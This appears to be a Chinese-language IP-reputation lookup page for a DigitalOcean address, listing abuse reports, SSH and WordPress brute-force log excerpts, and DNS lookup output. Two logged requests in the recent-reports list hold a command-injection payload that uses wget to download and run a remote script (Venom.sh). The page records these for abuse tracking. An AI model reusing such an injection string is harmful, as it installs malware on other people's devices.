142.93.22.9 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States

运营商(isp): DigitalOcean LLC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	Honeypot attack, port: 23, PTR: PTR record not found	2019-07-05 04:16:00

相同子网IP讨论:

IP	类型	评论内容	时间
142.93.223.118	attackspam	SSH login attempts.	2020-10-12 04:12:31
142.93.223.118	attackspam	SSH login attempts.	2020-10-11 20:11:30
142.93.223.118	attackspam	2020-10-11T07:03:53.476597lavrinenko.info sshd[19701]: Failed password for root from 142.93.223.118 port 55582 ssh2 2020-10-11T07:07:58.292860lavrinenko.info sshd[19798]: Invalid user next from 142.93.223.118 port 33376 2020-10-11T07:07:58.302917lavrinenko.info sshd[19798]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.223.118 2020-10-11T07:07:58.292860lavrinenko.info sshd[19798]: Invalid user next from 142.93.223.118 port 33376 2020-10-11T07:08:00.553715lavrinenko.info sshd[19798]: Failed password for invalid user next from 142.93.223.118 port 33376 ssh2 ...	2020-10-11 12:10:33
142.93.223.118	attackbotsspam	Oct 10 21:27:55 plex-server sshd[3588434]: Invalid user test001 from 142.93.223.118 port 46208 Oct 10 21:27:55 plex-server sshd[3588434]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.223.118 Oct 10 21:27:55 plex-server sshd[3588434]: Invalid user test001 from 142.93.223.118 port 46208 Oct 10 21:27:56 plex-server sshd[3588434]: Failed password for invalid user test001 from 142.93.223.118 port 46208 ssh2 Oct 10 21:31:46 plex-server sshd[3591113]: Invalid user mdpi from 142.93.223.118 port 50738 ...	2020-10-11 05:34:04
142.93.226.235	attack	142.93.226.235 - - [01/Oct/2020:19:13:57 +0100] "POST /wp-login.php HTTP/1.1" 200 2426 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [01/Oct/2020:19:14:06 +0100] "POST /wp-login.php HTTP/1.1" 200 2407 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [01/Oct/2020:19:14:11 +0100] "POST /wp-login.php HTTP/1.1" 200 2441 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-10-02 02:21:36
142.93.226.235	attackspam	142.93.226.235 - - [01/Oct/2020:10:54:27 +0100] "POST /wp-login.php HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [01/Oct/2020:10:54:29 +0100] "POST /wp-login.php HTTP/1.1" 200 2580 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [01/Oct/2020:10:54:30 +0100] "POST /xmlrpc.php HTTP/1.1" 403 219 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-10-01 18:30:52
142.93.226.235	attackspambots	142.93.226.235 - - \[30/Sep/2020:01:15:36 +0200\] "POST /wp-login.php HTTP/1.1" 200 12843 "-" "Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64\; rv:62.0$ Gecko/20100101 Firefox/62.0" 142.93.226.235 - - \[30/Sep/2020:01:15:39 +0200\] "POST /wp-login.php HTTP/1.1" 200 12678 "-" "Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64\; rv:62.0$ Gecko/20100101 Firefox/62.0" ...	2020-09-30 09:15:31
142.93.226.235	attack	142.93.226.235 - - [29/Sep/2020:17:37:16 +0100] "POST /wp-login.php HTTP/1.1" 200 2394 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [29/Sep/2020:17:37:21 +0100] "POST /wp-login.php HTTP/1.1" 200 2328 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [29/Sep/2020:17:37:24 +0100] "POST /wp-login.php HTTP/1.1" 200 2332 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-09-30 02:07:34
142.93.226.235	attack	(PERMBLOCK) 142.93.226.235 (NL/Netherlands/-) has had more than 4 temp blocks in the last 86400 secs; Ports: *; Direction: inout; Trigger: LF_PERMBLOCK_COUNT; Logs:	2020-09-29 18:08:25
142.93.226.235	attack	Attempts to probe web pages for vulnerable PHP or other applications	2020-08-28 16:58:58
142.93.226.235	attack	142.93.226.235 - - [22/Aug/2020:22:31:06 +0200] "POST /wp-login.php HTTP/1.0" 200 4748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-08-23 07:49:40
142.93.226.195	attackbotsspam	Port Scan ...	2020-08-14 07:54:42
142.93.226.235	attackbots	142.93.226.235 - - [12/Aug/2020:16:13:23 +0100] "POST /wp-login.php HTTP/1.1" 200 1969 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [12/Aug/2020:16:13:32 +0100] "POST /wp-login.php HTTP/1.1" 200 1954 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.226.235 - - [12/Aug/2020:16:13:34 +0100] "POST /xmlrpc.php HTTP/1.1" 403 219 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-08-13 00:34:58
142.93.226.235	attackspam	Detected by ModSecurity. Request URI: /wp-login.php	2020-08-06 03:19:39
142.93.229.65	attackspam	lee-Joomla Authentification : try to force the door...	2020-08-04 13:46:48

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.93.22.9
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11854
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;142.93.22.9.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019070401 1800 900 604800 86400

;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Fri Jul 05 04:15:54 CST 2019
;; MSG SIZE  rcvd: 115

HOST信息:

Host 9.22.93.142.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 9.22.93.142.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
123.24.2.72	attackspambots	1577082402 - 12/23/2019 07:26:42 Host: 123.24.2.72/123.24.2.72 Port: 445 TCP Blocked	2019-12-23 19:01:39
175.211.59.177	attackbots	Dec 23 10:26:28 icinga sshd[3405]: Failed password for root from 175.211.59.177 port 54972 ssh2 ...	2019-12-23 19:06:18
1.201.140.126	attackspam	ssh brute force	2019-12-23 18:44:13
185.24.233.60	attackspam	Dec 23 05:29:18 delaware postfix/smtpd[55865]: connect from 60-233-24-185.static.servebyte.com[185.24.233.60] Dec 23 05:29:18 delaware postfix/smtpd[55865]: connect from 60-233-24-185.static.servebyte.com[185.24.233.60] Dec 23 05:29:18 delaware postfix/smtpd[55865]: warning: 60-233-24-185.static.servebyte.com[185.24.233.60]: SASL LOGIN authentication failed: authentication failure Dec 23 05:29:18 delaware postfix/smtpd[55865]: warning: 60-233-24-185.static.servebyte.com[185.24.233.60]: SASL LOGIN authentication failed: authentication failure Dec 23 05:29:18 delaware postfix/smtpd[55865]: disconnect from 60-233-24-185.static.servebyte.com[185.24.233.60] ehlo=1 auth=0/1 quhostname=1 commands=2/3 Dec 23 05:29:18 delaware postfix/smtpd[55865]: disconnect from 60-233-24-185.static.servebyte.com[185.24.233.60] ehlo=1 auth=0/1 quhostname=1 commands=2/3 Dec 23 05:39:09 delaware postfix/smtpd[56211]: connect from 60-233-24-185.static.servebyte.com[185.24.233.60] Dec 23 05:39:09 ........ -------------------------------	2019-12-23 19:01:05
188.165.211.99	attack	Dec 23 12:08:44 markkoudstaal sshd[29512]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.165.211.99 Dec 23 12:08:46 markkoudstaal sshd[29512]: Failed password for invalid user herve from 188.165.211.99 port 42936 ssh2 Dec 23 12:14:03 markkoudstaal sshd[29947]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.165.211.99	2019-12-23 19:16:18
188.166.158.153	attackbotsspam	Dec 23 02:16:58 wildwolf wplogin[20004]: 188.166.158.153 informnapalm.org [2019-12-23 02:16:58+0000] "POST /blog/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "roman" "pasxxxxxxx234" Dec 23 02:16:59 wildwolf wplogin[20899]: 188.166.158.153 informnapalm.org [2019-12-23 02:16:59+0000] "POST /blog/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "irina" "" Dec 23 02:17:05 wildwolf wplogin[16022]: 188.166.158.153 informnapalm.org [2019-12-23 02:17:05+0000] "POST /blog/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "osint" "" Dec 23 02:17:11 wildwolf wplogin[20004]: 188.166.158.153 informnapalm.org [2019-12-23 02:17:11+0000] "POST /blog/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "pavant" "" Dec 23 02:17:13 wildwolf wplogin[15947]: 188.166.15........ ------------------------------	2019-12-23 19:08:11
197.36.245.82	attack	1 attack on wget probes like: 197.36.245.82 - - [22/Dec/2019:21:43:42 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 18:51:59
149.129.222.60	attack	Dec 23 10:27:54 Ubuntu-1404-trusty-64-minimal sshd\[23802\]: Invalid user biffs from 149.129.222.60 Dec 23 10:27:54 Ubuntu-1404-trusty-64-minimal sshd\[23802\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=149.129.222.60 Dec 23 10:27:56 Ubuntu-1404-trusty-64-minimal sshd\[23802\]: Failed password for invalid user biffs from 149.129.222.60 port 59902 ssh2 Dec 23 10:34:34 Ubuntu-1404-trusty-64-minimal sshd\[31602\]: Invalid user plus from 149.129.222.60 Dec 23 10:34:34 Ubuntu-1404-trusty-64-minimal sshd\[31602\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=149.129.222.60	2019-12-23 18:38:20
106.13.54.207	attackspambots	Dec 23 07:43:20 hcbbdb sshd\[6522\]: Invalid user pcap from 106.13.54.207 Dec 23 07:43:20 hcbbdb sshd\[6522\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.54.207 Dec 23 07:43:22 hcbbdb sshd\[6522\]: Failed password for invalid user pcap from 106.13.54.207 port 45100 ssh2 Dec 23 07:48:24 hcbbdb sshd\[8326\]: Invalid user noc from 106.13.54.207 Dec 23 07:48:24 hcbbdb sshd\[8326\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.54.207	2019-12-23 19:13:38
178.62.0.138	attack	[Aegis] @ 2019-12-23 10:12:43 0000 -> Attempted Administrator Privilege Gain: ET SCAN LibSSH Based Frequent SSH Connections Likely BruteForce Attack	2019-12-23 18:49:39
46.166.148.42	attackbots	\[2019-12-23 05:44:09\] SECURITY\[2857\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-12-23T05:44:09.943-0500",Severity="Error",Service="SIP",EventVersion="1",AccountID="4931011441241815740",SessionID="0x7f0fb40aad28",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/46.166.148.42/60452",ACLName="no_extension_match" \[2019-12-23 05:44:27\] SECURITY\[2857\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-12-23T05:44:27.346-0500",Severity="Error",Service="SIP",EventVersion="1",AccountID="3077011441241815740",SessionID="0x7f0fb4a47618",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/46.166.148.42/65398",ACLName="no_extension_match" \[2019-12-23 05:44:44\] SECURITY\[2857\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-12-23T05:44:44.436-0500",Severity="Error",Service="SIP",EventVersion="1",AccountID="0395000441241815740",SessionID="0x7f0fb40aad28",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/46.166.148.42/52766",ACL	2019-12-23 19:05:53
75.31.93.181	attackbotsspam	Dec 23 11:03:33 * sshd[10420]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=75.31.93.181 Dec 23 11:03:35 * sshd[10420]: Failed password for invalid user shyhchin from 75.31.93.181 port 9046 ssh2	2019-12-23 19:04:13
156.199.141.47	attack	1 attack on wget probes like: 156.199.141.47 - - [22/Dec/2019:07:31:56 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 18:40:47
45.55.136.206	attackspam	Dec 23 08:13:16 IngegnereFirenze sshd[13383]: Failed password for invalid user yolandam from 45.55.136.206 port 57551 ssh2 ...	2019-12-23 18:41:32
148.66.135.178	attackbots	$f2bV_matches	2019-12-23 19:17:08

最近上报的IP列表

255.68.137.227	46.176.208.27	141.103.69.69	122.164.5.8
147.154.99.89	140.213.12.250	245.253.28.161	219.107.63.185
171.96.220.254	75.223.94.40	192.237.147.32	17.174.199.249
96.89.130.100	51.68.11.211	244.169.21.191	193.218.39.242
182.191.148.225	31.152.71.201	119.3.72.248	90.122.4.31